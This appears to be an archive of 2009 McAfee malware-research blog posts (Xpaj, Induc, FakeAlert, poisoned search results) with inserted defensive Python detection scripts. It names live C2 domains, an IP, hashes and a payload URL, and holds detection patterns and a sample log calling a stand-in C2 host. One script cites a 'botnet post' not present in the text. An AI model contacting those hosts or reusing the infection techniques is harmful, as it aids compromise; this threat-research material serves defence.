    The use of social engineering to grab the attention of recipients and to deliver malware is nothing novel. The latest trend in spreading malware is to exploit a current celebrity story, disaster or other high-profile news event. The threat can be delivered as email or as poisoned search-engine results that lead to malware. In the past, we have come across innumerable incidents, such as Michael Jackson’s death or Benazir Bhutto’s assassination, used as an arena to spread malware. Lately, we have observed an increase in the number of OLE files being used in targeted attacks against various high-profile users.

    The exploit and lure claim to contain information on the Pakistani Air Force and arrive via email as a PowerPoint document attachment. When an unsuspecting user with a vulnerable version of PowerPoint launches the document, the vulnerability is exploited and the malicious payload is executed.

    The vulnerability lies in a malformed record within PowerPoint that can be exploited to execute malicious code. The shellcode uses the Process Environment Block (PEB) approach to determine the kernel32.dll base address, as shown in the figure below.

    Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

    The malicious PPT file exploits an older vulnerability that was patched by Microsoft in bulletin MS06-028. This attack is detected with the current DATs as Exploit-PPT.h, and the dropped malicious executable is detected as BackDoor-EFB.

    W32/Xpaj: Know Your Polymorphic Enemy

    Nowadays, most anti-virus products can deal with viruses relatively easily using a variety of technologies. Decent emulator-based scan engines can handle the majority of polymorphic and metamorphic viruses, including those that use the entry-point obscuring (EPO) technique. But when it comes to viruses with delayed loading and random code-block insertion, such as W32/Zmist (a.k.a. Mistfall), code emulators are not the best approach. We recently came across a new W32/Xpaj variant that is actively spreading. It utilizes well-known evasion techniques that are otherwise seldom found in live virus analysis.

    The new W32/Xpaj uses a random code block integration technique to infect files. It does not change the original entry point of the file. Instead, W32/Xpaj builds several code blocks responsible for different functionalities and moves them into random locations throughout the code section of the infected file. It is similar to what W32/Zmist used to employ, but W32/Xpaj uses code replacement instead of code insertion.

    Its polymorphic decryptor is represented by a number of code blocks linked by unconditional jumps. Once executed, the polymorphic decryptor gains control and performs different tasks:

    1. Saving the original state of the infected application and preserving all the registers used by the virus
    2. Changing the protection flags of the memory where the virus body is located
    3. Decrypting the virus body
    4. Jumping to the decrypted virus body, etc.

    Each task may be located in a separate block of code or combined in one big block.

    Once decryption is done, control passes to the main virus body, usually located in a different section. Its authors decided to use register-based jumps instead of relative jumps. The former, together with a heavily encrypted virus body and stolen functions, make this new variant more complicated to repair:

    In an attempt to make sure the virus is executed at least once, W32/Xpaj searches and replaces a number of call instructions to point to the beginning of one of the virus code blocks created during the infection.

    The random location of the polymorphic code blocks means that for some samples, code emulators may never reach the viral instructions. Such samples may present a hidden surprise to some anti-virus vendors, which might not be able to detect all instances of W32/Xpaj, missing a certain percentage of infected files. However, in other cases, the virus may never gain control at all, such as in the following samples found in the wild:

    • 4843998e3564ac1a1e137149bc3ce28e
    • 8e4260d0a29c0133bad3bc0e39057456
    • db4fff8a4a21e9c824cde3ebd151fbf2

    While decrypting the virus body, W32/Xpaj may generate millions of iterations. Code emulators without decent support for dynamic code translation may fail to run it through correctly. It integrates itself into infected files and becomes a part of the host program’s control flow. Original functions replaced with the virus decryptor are saved, encoded, and located in the same section as the virus body.

    This variant of W32/Xpaj increases the virtual size of the section containing the virus body by 150KB. It is heavily obfuscated and contains functionality to receive further instructions from remote servers:

    • tooratios.com (82.98.235.66)
    • abdulahuy.com (82.98.235.66)
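An added example (Python, not the McAfee author's code) of the check a responder can make for the section-size symptom just described: compare the section table of a suspect file with a known-good copy of the same program and report sections whose virtual size grew. The two PE images are constructed, header-only samples, and the 100 KB threshold is an assumption.

```python
import struct

# Added example, not code from the original post: compare the PE section table of a
# suspect binary against a known-good copy of the same program. The post reports that
# this W32/Xpaj variant grows the virtual size of the section holding the virus body
# by about 150 KB, so a large VirtualSize increase in one section is worth a closer look.
# The parser reads the section table directly; the PE images below are constructed
# header-only samples and the 100 KB threshold is an assumption, not a published figure.

SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
GROWTH_THRESHOLD = 100 * 1024


def section_table(data: bytes) -> list:
    """Return [(name, VirtualSize, SizeOfRawData, Characteristics), ...] from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    n_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    off = pe_off + 24 + opt_size                               # table follows the optional header
    out = []
    for _ in range(n_sections):
        name, vsize, _va, rsize, _ptr, _rl, _ln, _nr, _nl, chars = struct.unpack_from(SECTION_FMT, data, off)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rsize, chars))
        off += struct.calcsize(SECTION_FMT)
    return out


def section_growth(baseline: bytes, suspect: bytes, threshold: int = GROWTH_THRESHOLD) -> list:
    """Sections whose VirtualSize grew by more than `threshold` bytes relative to the baseline."""
    base = {name: vsize for name, vsize, _r, _c in section_table(baseline)}
    grown = []
    for name, vsize, _r, _c in section_table(suspect):
        if name in base and vsize - base[name] > threshold:
            grown.append((name, vsize - base[name]))
    return grown


def build_sample_pe(sections) -> bytes:
    """Construct a minimal PE32 header: DOS stub, COFF header, blank optional header, section table."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew -> PE signature
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic; rest left zero
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(
        struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, 0x1000, rsize, 0x400, 0, 0, 0, 0, chars)
        for name, vsize, rsize, chars in sections
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Constructed samples: a clean layout and the same program with its code section grown by 150 KB.
CLEAN = build_sample_pe([(b".text", 0x8000, 0x8000, 0x60000020),
                         (b".data", 0x2000, 0x1000, 0xC0000040)])
INFECTED = build_sample_pe([(b".text", 0x8000 + 150 * 1024, 0x8000 + 150 * 1024, 0x60000020),
                            (b".data", 0x2000, 0x1000, 0xC0000040)])
```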

    The server is currently active and located in Belgium, and sends instructions through the following file:

    • hxxp://abdulahuy.com/{blocked}/stamm.dat

    Interestingly, the malware authors decided to monitor their own virus’s activity and built logging support into this beast. Every file infected with W32/Xpaj reports to the above-mentioned server and sends information about the system (OS version, service pack, IP, etc.) on which the infected file is running:

    os=00000005.00000001.02000B28&cm=18B51294&adn=A120BB0F&knv=00000012&hdd=002F606E&cid=0000000C&vvr=00000001
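The check-in traffic described in both W32/Xpaj posts (the /up.php poll and the stamm.dat / plugin.dat fetches in the botnet post, and the os=...&cm=... report just shown) can be picked out of proxy logs. This is an added example in Python, not code from the McAfee posts; the log lines, the C2 hostname and the report path are constructed, and the meaning of the cm value is not documented in the posts.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not code from the McAfee posts: proxy-log triage for the W32/Xpaj
# check-in traffic. Matching is on path and query only: the hosts are generated daily
# by the DGA, so a hostname blocklist would always lag behind.
# The log lines, the C2 hostname and the report path below are constructed.

HEX8 = r"[0-9A-Fa-f]{8}"
OS_RE = re.compile(rf"^{HEX8}\.{HEX8}\.{HEX8}$")
CM_RE = re.compile(rf"^{HEX8}$")
PAYLOAD_RE = re.compile(r"/(?:stamm/stamm|plugin/plugin)\.dat$")


def parse_report(qs: dict) -> dict:
    """Decode the os=major.minor.extra field (three 32-bit hex words) of the report.
    Assumption: the third word carries service-pack/build detail; it is kept raw."""
    major, minor, extra = (int(x, 16) for x in qs["os"].split("."))
    return {
        "os_version": f"{major}.{minor}",      # 5.1 is Windows XP
        "os_extra": f"{extra:08X}",
        "cm": qs["cm"].upper(),                # same cm= marker as in the /up.php poll
        "fields": sorted(k for k in qs if k not in ("os", "cm")),
    }


def classify_url(url: str):
    """Return (kind, details) for a URL matching one of the C2 patterns, else None."""
    parts = urlsplit(url)
    qs = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if "os" in qs and "cm" in qs and OS_RE.match(qs["os"]) and CM_RE.match(qs["cm"]):
        return "report", parse_report(qs)
    if parts.path == "/up.php" and "cm" in qs and CM_RE.match(qs["cm"]):
        return "poll", {"a": qs.get("a"), "cm": qs["cm"].upper()}
    if PAYLOAD_RE.search(parts.path):
        return "payload", {"file": parts.path.rsplit("/", 1)[-1]}
    return None


def triage(lines):
    """Lines are '<epoch> <client_ip> <method> <url>'; returns (client_ip, kind, details) hits."""
    hits = []
    for line in lines:
        fields = line.split(maxsplit=3)
        if len(fields) != 4:
            continue
        _ts, client, _method, url = fields
        found = classify_url(url)
        if found:
            hits.append((client, found[0], found[1]))
    return hits


def infected_hosts(lines) -> set:
    """Client addresses with at least one C2-pattern hit."""
    return {client for client, _kind, _details in triage(lines)}


# Constructed log: the hostname is a placeholder and /report.php is an assumed path;
# the query values follow the two posts.
SAMPLE_LOG = """\
1254300000.101 10.0.0.5 GET http://example-c2.invalid/up.php?a=g2&cm=15A91F71
1254300001.203 10.0.0.5 GET http://example-c2.invalid/stamm/stamm.dat
1254300002.305 10.0.0.7 GET http://www.example.com/index.html
1254300003.407 10.0.0.5 GET http://example-c2.invalid/report.php?os=00000005.00000001.02000B28&cm=18B51294&adn=A120BB0F&knv=00000012&hdd=002F606E&cid=0000000C&vvr=00000001
""".splitlines()
```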

    The majority of AV vendors do not currently detect this W32/Xpaj variant (as seen in these VirusTotal results):

    Search-Engine Manipulation Evolves as Trust Abuse Grows

    I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

    Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends). I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

    It seems now that attackers are combining various elements of different attacks to achieve blackhat SEO.

    There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different than in the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation.

    Historically we’ve seen attackers upload malicious content to compromised sites, either directly by injecting exploit code, or indirectly by injecting an iframe or script that brings in exploit code from a remote site. Such situations can lead to site users notifying the compromised site’s administrator that they were attacked while visiting that site. Redirecting victims to a completely different site helps conceal the poisoned site.

    The attackers go a step further by implementing a well-used trick, which is to redirect conditionally. It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) navigating to http://compromised-site.com/attacker_created_page will not be redirected to a payload site unless they are coming from a Google search-result page.

    Some of the compromised sites are running older, vulnerable phpBB and WordPress applications. Other sites are serving attacker HTML pages, perhaps as a result of compromised admin/user credentials or misconfigured web servers.
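For a site administrator, the conditional redirect described above leaves a footprint in the web server's own access log: the same path answers search-engine visitors with a redirect and everyone else with a 200. The following is an added example, not code from the original post; the Apache combined-format lines and hostnames in it are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Added example, not part of the original post: a check a site administrator can run
# over the access log to find attacker-created pages that redirect only visitors who
# arrive from a search-result page. The log lines and hostnames are constructed.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SEARCH_HOSTS = ("google.", "bing.", "yahoo.")


def is_search_referer(referer: str) -> bool:
    """True if the Referer header points at a search engine (e.g. google.com/search?q=...)."""
    if referer in ("", "-"):
        return False
    host = urlsplit(referer).netloc.lower()
    return any(s in host for s in SEARCH_HOSTS)


def find_cloaked_paths(lines):
    """Paths that answered search-engine visitors with a 3xx redirect but served
    direct (non-search) visitors a normal 200: the signature of conditional redirection.
    A path that redirects everyone (a real moved page) is not reported."""
    seen = defaultdict(lambda: {"search": set(), "direct": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        bucket = "search" if is_search_referer(m["referer"]) else "direct"
        seen[m["path"]][bucket].add(int(m["status"]))
    cloaked = []
    for path, st in seen.items():
        if any(300 <= s < 400 for s in st["search"]) and 200 in st["direct"]:
            cloaked.append(path)
    return sorted(cloaked)


# Constructed access-log lines (Apache combined format). The forum page below behaves
# like the attacker page described in the post; /old-news.html is an ordinary redirect.
SAMPLE_LOG = [
    '203.0.113.9 - - [05/Oct/2009:10:01:02 +0000] "GET /forum/viewtopic.php?t=4421 HTTP/1.1" 302 0 '
    '"http://www.google.com/search?q=bengals+blackout" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Oct/2009:10:02:10 +0000] "GET /forum/viewtopic.php?t=4421 HTTP/1.1" 200 5120 '
    '"-" "Mozilla/5.0"',
    '203.0.113.10 - - [05/Oct/2009:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 8810 '
    '"http://www.google.com/search?q=site" "Mozilla/5.0"',
    '192.0.2.7 - - [05/Oct/2009:10:04:00 +0000] "GET /forum/viewtopic.php?t=4421 HTTP/1.1" 200 5120 '
    '"http://www.example.org/links.html" "Mozilla/5.0"',
    '203.0.113.11 - - [05/Oct/2009:10:05:00 +0000] "GET /old-news.html HTTP/1.1" 301 0 '
    '"http://www.google.com/search?q=news" "Mozilla/5.0"',
    '198.51.100.5 - - [05/Oct/2009:10:06:00 +0000] "GET /old-news.html HTTP/1.1" 301 0 '
    '"-" "Mozilla/5.0"',
]
```

The check keys on the Referer header only; a redirect that also depends on the visitor's User-Agent would need the same comparison per user-agent class.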

    These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

    FakeAlert Malware Disguises as McAfee Product

    “Illusion is needed to disguise the emptiness within.” – Arthur Erickson

    I thought this was the perfect quote for fake anti-malware software, or FakeAlert threats. FakeAlert malware imposes an illusion of protection on its users, but all that lies within is hollow. It has become a common sight for malware to spoof program file resources such as icons or company information from other legitimate software. Among the most spoofed resources are Microsoft file properties such as company information or icons from programs like “calc.exe” and “notepad.exe”, and even Windows folder icons. Why would they do this?

    It is easy for less computer-savvy users to trust that a program is legitimate based on visible features of a file, such as its icon or file properties. It’s a nice facade for malware to slip through. We recently came across a FakeAlert threat that attempts to disguise itself as a McAfee product using a spoofed McAfee icon. Perhaps FakeAlert malware authors are taking notice of McAfee as one of the world’s most trusted security companies.

    Call it social engineering or just another sneaky attempt to get by. The bottom line is that looks are deceptive, so don’t trust everything you see, whether it’s a resource icon or company information in the file properties. This FakeAlert malware, which brands itself as “AntiVirus Pro 2010”, is nothing more than a spin-off of FakeAlert-XPSecCenter (a.k.a. WinreAnimator, among its many re-branded names).

    The following are some updated snapshots of FakeAlert-XPSecCenter:

    Image 1
    Image 2
    Image 3

    Please beware of this FakeAlert variant; it is not in any way related to McAfee products. Safe surfing!

    Google Trends Suffering Abuse Today

    Wouldn’t you know it. Just the other day I blogged about rogue anti-virus software makers selectively targeting certain hot search terms. Since then the majority of top terms lead to poisoned links within the top 10-20 search results.

    Recently there have been some news stories about attackers targeting specific topics or terms, but from what I’m seeing they are pretty indiscriminate. It doesn’t matter what the topic is. If people are searching for it, then the bad guys want to poison the results. The speed at which these links appear suggests the operation is largely automated.

    Here’s one example for bengals blackout. One potential way of identifying a bad link is if the title is exactly the same as the search term, it’s in all-capital letters, and the URL contains the search terms as well. The summary usually contains the text you’d expect to find in a news story. This is not a foolproof way to call something bad, but it’s a strong indication that something might be fishy.

    Search safe.

    New Version of McAfee FileInsight

    Today we released the new version 2.1 of McAfee FileInsight. You can download your free copy from the Avert Tools site. FileInsight is a handy integrated tool environment for web site and file analysis. It offers hex editing, syntax highlighting, several built-in decoders, a built-in calculator, a disassembler, JavaScript scripting support, a Python-based plugin system, and much more.

    Let’s go through some stages of an exemplary malware attack to highlight some of its analysis features – but don’t try this stunt at home, unless you know what you’re doing; a safe, isolated lab environment is absolutely mandatory for any such research work.

    The above screen shows the initial malicious web site, which tries to determine your browser and redirect to one or more exploits of its choice. One of them is an exploit for the Microsoft DirectShow Video ActiveX Control Vulnerability (MS09-032) (stopped as “Exploit-MSDirectShow.b” by McAfee VirusScan and as “BehavesLike.Exploit.CodeExec.EBEO” by McAfee Gateway Anti-Malware).

    Getting to the actual shellcode takes some JavaScript unpacking steps. The JavaScript code is spread over several script files and custom encoded. In the above screen, we take that malicious code into FileInsight’s Scripting window and let it deobfuscate there.

    Once we’re down to the shellcode level, we can directly look at the shellcode in the built-in disassembler. The Disassembler window also features recursive traversal to come up with branch labels automatically.

    It uses a CALL-to-POP sequence to determine the actual memory location of the obfuscated payload, sets up a loop to decode the payload, and then executes it in order to download an XOR-obfuscated executable that turns out to be a UPX-packed backdoor (stopped by Artemis and by McAfee Gateway Anti-Malware as “LooksLike.Win32.Suspicious.C”).

    Advanced users may also want to look into FileInsight’s Python-based plugin system, but be warned: writing plugins with the overwhelming simplicity of the Python language has a certain addiction potential! ;-)

    FileInsight is available here.

    Chinese Pharmacy Spam and Our Monthly Spam Report

    The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

    The report reveals the truth behind the “Chinese pharmacy” spam:

    • “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
    • Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
    • “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
    • If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

    Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

    • The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
    • The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
    • Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

    Check out the full report here.

    Searching for Malware Data Likely to Lead to More Malware

    It’s been a while since I blogged about Google Trends being abused to serve malware. However, recent attention around Google search poisoning led me to check on things. It seems the attackers are being more selective in the search terms that they target, favoring those that have something to do with computer security. Hunting for poisoned search results based on random hot-search terms is hit or miss (and more miss than hit, at least in the top 10 results). But terms that contained virus, trojan, rogue, and bulletin all led to poisoned top search results. Some even led to pages and pages of bogus links, which redirect to rogue anti-virus malware.

    The following image is not intended to show the actual text of the search results, but rather it highlights the fact that four out of the top fifteen results are poisoned for one of today’s most searched terms at the time of this writing:

    Starting from result number 20, the situation gets much worse–with dozens of poisoned results:

    Granted, the link names on the second batch of results have nothing to do with the trojan search term I used. However, the attackers have set up thousands of pages that cross-link to each other, and contain various hot-search terms and content. So even if the long tail of poisoned results on any search term has a low conversion rate for that term, it can still serve to boost the score of other pages and terms that have a higher conversion rate.

    Once a search user takes the bait, it’s business as usual for the attackers:

    Graphic displayed while web page loads

    Bogus warning message displayed from web page

    Simulated system scan displayed from web page

    Bogus scan results displayed from web page

    Task Manager Still Working? Can You Change Your Windows Password?

    Update of September 3:

    Some detections of this Trojan were on a component of a commercial application. For this reason we’ve updated the detection type to “potentially unwanted program” (PUP). Customers who see files that exhibit the behavior discussed in the Threat Library for QTaskMgr-1 should submit the file to McAfee Avert Labs.

    In anti-virus research, context is everything. We had a sample that was not signed correctly and behaved suspiciously. We have to think of our users’ security; thus we detected the file. Without knowing that the sample was part of a nonmalicious application, we had to assume it was dangerous.

    One reason we make this assumption is due to cases such as files infected with Induc. Here, even if the binary’s resources check out, it’s still compromised. If it looks bad, smells bad, tastes bad, and you’re not told otherwise—then it probably is bad.

    Original blog, published September 1:

    We’ve heard about malware that reduces a computer’s state of security. Such malware might, for instance, disable your access to the registry, lower Internet Explorer’s security configuration, delete system files, or manipulate the system’s DNS settings. Each of these steps exposes the victim to graver malware infections or system compromise.

    Yesterday we ran into a Trojan that weakens the victim system’s security by making registry changes. The malware disables Task Manager, Windows Update, and toolbars in Internet Explorer. Further, it does not let you lock your machine or change your password. If you pressed Ctrl+Alt+Del after the infection you would see this:

    Because losing Task Manager is the most damaging security attack on our list above, we’ve called this Trojan QTaskMgr-1. We include detection and cleaning for QTaskMgr-1 since the 5727 DATs, released September 1.

    Prepare for the new upcoming 2010 AV products.

    Many major security companies are about to release their new retail products for 2010. Expect some comparative reviews in the coming months; check what you need and stay protected.

    Some ‘2010’ products are already out on the web, but unfortunately most of them are FakeAlert Trojans or scareware.

    Once downloaded, you see pop-up windows alerting you about malware found on your machine and asking you to buy the product. The actual problem is the software you just executed.

    We have been reporting about FakeAlert Trojans before – you may remember some products named:

    - “Virus Remover 2007”
    - “Win AntiSpyware 2008”
    - “AntiVirus VIP”
    - “AntiSpyware Pro2009”
    - …

    To name just a few. But let’s look at this “2010” example:

    Screenshot of Fakealert Webpage

    Before you think about buying a new product or testing a trial version, you should:

    - Use McAfee SiteAdvisor to get a rating of the page you’re looking at.
    - Type the product name into your favorite search engine and have a look.
    - Check comparative reviews – don’t believe in the awards posted on the page.
    - Still unsure? Go to the nearest store and buy a box. There are no FakeAlert products available as a boxed product in a store; they sell online only.

    If you are already running an anti-virus product from a known vendor and you get annoyed by pop-ups or bogus alerts, or have a different issue, contact its technical support first.

    Quote from the bottom of the screen:

    According to security experts, most spyware types are not detected by antiviruses because they are disguised as legitimate software installed with the user’s consent.

    Actually, ‘PC Antispyware 2010’ is a perfect example of such “malicious software disguised as legitimate software”.

    Of course, we and other major security companies do add detection for those FakeAlert products as Trojans.

    McAfee SiteAdvisor rates this page as RED.
    McAfee VirusScan detects the installer as Generic FakeAlert.d!gen
    McAfee Secure Gateway detects Trojan.Dldr.FraudLo.sxm

    Is Apple Opening a Can of Worms?

    It has now been widely reported that Apple’s latest operating system, Snow Leopard contains the ability to identify two families of Mac malware–OSX/Puper and OSX/IWService–when the infectious DMG files are downloaded and mounted as part of the infection process.

    There are a number of ramifications of such a move that could be discussed, but the intention of this post is to call out the possibility of this being a catalyst for more Mac malware to be created.

    As previously noted on our blog, the growth rate of malware (notably PC malware) is partly due to the success of defenses; the bad guys react and pump out more and more malware in an effort to circumvent those defenses. Apple’s inclusion of malware identification in the OS could certainly be a catalyst for a more intense game of cat and mouse with virus authors, an ironic scenario should this come about.

    Brazilian Malware Writers Stumble Again

    I like to pick on malware writers, especially the dumb ones as you can see here. Sometimes they’re just too big a target to ignore.

    The latest round is with Brazilian malware writers again. As you are aware, some days ago the Delphi virus was discovered; we detect it as W32/Induc. So today I got a Brazilian PWS-banker malware that was infected with–guess what?–the W32/Induc Delphi virus! What an irony. :)

    Back in 2007, I wrote about something quite similar here. And, surprise, it was another Brazilian PWS-banker malware.

    So, please, malware writers, repeat after me: “I must install anti-virus software. I must install anti-virus software.”

    Today, you can buy a customized Brazilian PWS-banker malware for about US$50. That may explain why it is so cheaply made. :)

    Induc Virus Abuses Delphi Compiler

    The W32/Induc virus has been in the wild for at least a year. During this period it has succeeded in infecting a lot of Delphi installations, including manufacturers of some pretty popular software packages.

    On a victim’s machine this virus searches for the presence of a specific version (4.0, 5.0, 6.0 and 7.0) of the Delphi compiler. The virus gathers this information using the registry entry below.

    Registry location to find the Delphi version

    If it finds one of these versions, the virus inserts its code into the file SysConst.pas, which is present in x.0\Source\rtl\sys. The virus renames the current Sysconst.dcu, which is present under the Delphi library folders, to SysConst.bak. The SysConst.pas file containing the viral code–like the one shown below–is compiled using the Delphi command-line compiler dcc32.exe to create an infected SysConst.dcu. The original SysConst.pas file is then deleted.

    Viral Code

    McAfee detects all files that have been compiled with the infected Delphi program as W32/Induc. Some customers have contacted us suspecting that this result is a false positive, but this is a known, correct detection from McAfee.

    This virus does not have a malicious payload. It just spreads through the compiled executables.
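The infection steps above leave file-system traces that a developer can check for without waiting for a scan of the compiled output. The script below is an added example, not a McAfee tool: it looks for the three traces the post describes (an original SysConst.dcu renamed to SysConst.bak, a rebuilt SysConst.dcu that no longer matches that backup, and a deleted SysConst.pas). The folder layout it assumes (Source\Rtl\Sys for the source, Lib for the compiled units) and the install root are assumptions; the registry lookup that finds the root is left to the caller.

```python
"""Check a Delphi installation for the traces W32/Induc leaves behind.

Added example, not McAfee's tool.  The indicators follow the infection steps
described in the post; the folder layout (Source\\Rtl\\Sys, Lib) is an
assumption, so pass the install root the Delphi registry entry points to.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def check_delphi_root(root):
    """Return a list of Induc indicators found under one Delphi install root."""
    root = Path(root)
    source_pas = root / "Source" / "Rtl" / "Sys" / "SysConst.pas"
    lib = root / "Lib"
    dcu, bak = lib / "SysConst.dcu", lib / "SysConst.bak"
    findings = []

    # The virus keeps the original unit as SysConst.bak; a clean install has none.
    if bak.exists():
        findings.append("SysConst.bak present in %s" % lib)
        # The unit now in use should match the backup; a different hash means
        # it was rebuilt from a modified SysConst.pas with dcc32.exe.
        if dcu.exists() and sha256_of(dcu) != sha256_of(bak):
            findings.append("SysConst.dcu differs from SysConst.bak (rebuilt unit)")

    # The virus deletes the patched SysConst.pas after compiling it.
    if not source_pas.exists():
        findings.append("SysConst.pas missing from %s" % source_pas.parent)
    return findings


def make_sample_install(root, infected=False):
    """Lay out a constructed Delphi tree, optionally carrying Induc's traces."""
    root = Path(root)
    src_dir = root / "Source" / "Rtl" / "Sys"
    lib = root / "Lib"
    src_dir.mkdir(parents=True, exist_ok=True)
    lib.mkdir(parents=True, exist_ok=True)
    (src_dir / "SysConst.pas").write_text("unit SysConst; (* constructed sample *)\n")
    (lib / "SysConst.dcu").write_bytes(b"ORIGINAL-DCU")
    if infected:
        (lib / "SysConst.dcu").rename(lib / "SysConst.bak")
        (lib / "SysConst.dcu").write_bytes(b"REBUILT-DCU-WITH-VIRAL-CODE")
        (src_dir / "SysConst.pas").unlink()
    return root


def demo():
    """Run the check against a clean and an infected constructed tree."""
    results = []
    for infected in (False, True):
        with tempfile.TemporaryDirectory() as tmp:
            results.append(check_delphi_root(make_sample_install(tmp, infected)))
    return results          # [[], [three indicators]]


if __name__ == "__main__":
    for label, findings in zip(("clean", "infected"), demo()):
        print(label, findings or "no Induc indicators")
```

A SysConst.bak alone is enough to warrant rebuilding the unit from a trusted SysConst.pas; the hash comparison only confirms that the unit in use is not the one the backup holds.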

    Introducing the IEEE Industry Connections Security Group

    Agreement and collaboration have been two of the greatest challenges the security community has faced from the very beginning. In an effort to address this, The Industry Connections Security Group (ICSG), a new offering from the IEEE, allows like-minded companies to come together to solve industry or business problems that center on information security. Industry Connections is a program under the IEEE that allows for a fast start-up toward industry collaboration. It also offers the support and infrastructure of an established and well known brand—the IEEE itself. This effort will allow the group to focus on the work of security standards and problem solving, rather than being slowed down with issues such as incorporation or intellectual property matters. McAfee is proud to be a founding member of this effort.

    The ICSG is a group of computer security organizations that will work together on common goals and industry issues. The key focus of our collaboration is to solve security issues. In the past few years, attackers have shifted away from mass distribution of a small number of threats to micro distribution of millions of distinct threats. ICSG was established, under the umbrella of the IEEE Standards Association (IEEE-SA) Industry Connections program, out of the desire by many of us in the security industry to pool our experience and resources in response to the systematic and rapid rise in new malware being introduced to the market. The bad actors have been able to leverage the underground economy and scale their efforts, they have access to specialist tools and services, and they collaborate and communicate effectively—whereas the security industry has been generally responding to threats as individual entities.

    Although there has been some ad-hoc cooperation in the industry in areas such as malware and phish URL sharing, this cooperation has not been standardized or documented in a format that lends itself to systematic improvement in operational efficiency or visibility, or review by people outside the vertical industries. It is this collaborative and communicative gap that the ICSG looks to close. ICSG has been established to look at and deal with a wide variety of security issues in a forum that allows us to engage all types of industry verticals. We also anticipate that we can work with other efforts to help drive security standards in other areas.

    ICSG currently has one team, the Malware Working Group, looking at malware, but the organization will add more as needs evolve. Malware growth has been meteoric for the last several years. As such, the Malware Working Group’s primary goal is to solve some of the malware-related issues the industry faces today. The initial focus will be to establish more intelligent ways of sharing malware samples and the information associated with them to make the computer security industry more effective at combating this ever-evolving threat.
    The initial members of ICSG are McAfee, Microsoft, Symantec, Sophos, AVG, and Trend Micro. A number of other individuals have been involved in reviewing the initial document produced by the Malware Working Group, from a variety of companies involved in computer security. If you are looking to join or need info, contact us at:

    • joinICSG@ieee.org, joinICSGMal@ieee.org, IndustryConnections@ieee.org

    Procedures and policies that have been adopted can be viewed here. Information about the Malware Working Group can be found here.

    Collateral Damage (continued)

    While Dmitri Alperovitch wrote his blog entry about the recent DDoS attack against Twitter and some other platforms hosting accounts of a pro-Georgian blogger nicknamed cyxymu, I browsed the Internet, searching for malicious websites taking advantage of this topic.

    The second result of my Google search was a link proposing to add the blogger as a friend. This link was a lure that redirected me to a site promoting a fake anti-virus product.
    Once again, we did not have to wait long before encountering such sites taking advantage of the news.

    Q2 Threats Report Released–It’s All About Botnets and Spam

    Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

    More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over last quarter’s rise. The report confirmed our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak in October 2008 before the takedown of the spam-hosting ISP McColo.

